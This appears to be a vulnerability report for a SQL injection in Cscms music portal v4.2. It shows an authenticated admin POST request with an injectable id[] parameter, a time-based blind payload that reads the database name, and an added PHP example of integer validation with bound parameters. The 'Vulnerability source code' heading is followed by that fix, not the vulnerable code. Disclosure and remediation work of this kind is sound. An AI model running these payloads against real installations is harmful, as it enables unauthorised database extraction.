After the administrator logs in, the following data package is constructed
```
POST /admin.php/dance/admin/lists/zhuan HTTP/1.1
Host: cscms.test
Content-Length: 23
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/lists?v=7131
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n9lv1ptm53932qcefgtfamknehtiv096;XDEBUG_SESSION=PHPSTORM
Connection: close

id[]=(sleep(5))&cid=5
```
The payload executes and sleeps for 5 seconds
Construct payload:
```
(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)
```
Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code
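As an added example, not code from the Cscms project: one way a handler that receives `id[]` and `cid` can reject anything that is not a plain integer and pass the rest as bound parameters. The `dance` table, its `id` and `cid` columns, the `UPDATE` statement and both function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not Cscms code. Table and column names (dance, id, cid)
// and the function names are hypothetical.

/** Accept only non-negative ASCII decimal integers; reject everything else. */
function parse_ids(mixed $raw): array
{
    if (!is_array($raw) || $raw === []) {
        throw new InvalidArgumentException('id[] must be a non-empty array');
    }
    $ids = [];
    foreach ($raw as $v) {
        if (!is_string($v) || !ctype_digit($v) || strlen($v) > 10) {
            throw new InvalidArgumentException('id[] must contain only integers');
        }
        $ids[] = (int) $v;
    }
    return array_values(array_unique($ids));
}

/** Move the given rows to category $rawCid using bound parameters only. */
function move_to_category(PDO $db, mixed $rawIds, mixed $rawCid): int
{
    $ids = parse_ids($rawIds);
    $cid = parse_ids([$rawCid])[0];
    // One "?" placeholder per id; no request data is concatenated into the SQL.
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("UPDATE dance SET cid = ? WHERE id IN ($marks)");
    $stmt->execute(array_merge([$cid], $ids));
    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE dance (id INTEGER PRIMARY KEY, cid INTEGER)');
$db->exec('INSERT INTO dance (id, cid) VALUES (1, 1), (2, 1), (3, 2)');

echo move_to_category($db, ['1', '2'], '5'), " rows moved\n";

// The id[] value from the report is rejected before any SQL is built.
try {
    move_to_category($db, ['(sleep(5))'], '5');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```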
SQL injection vulnerability exists in Cscms music portal system v4.2 (dance_Lists.php_zhuan)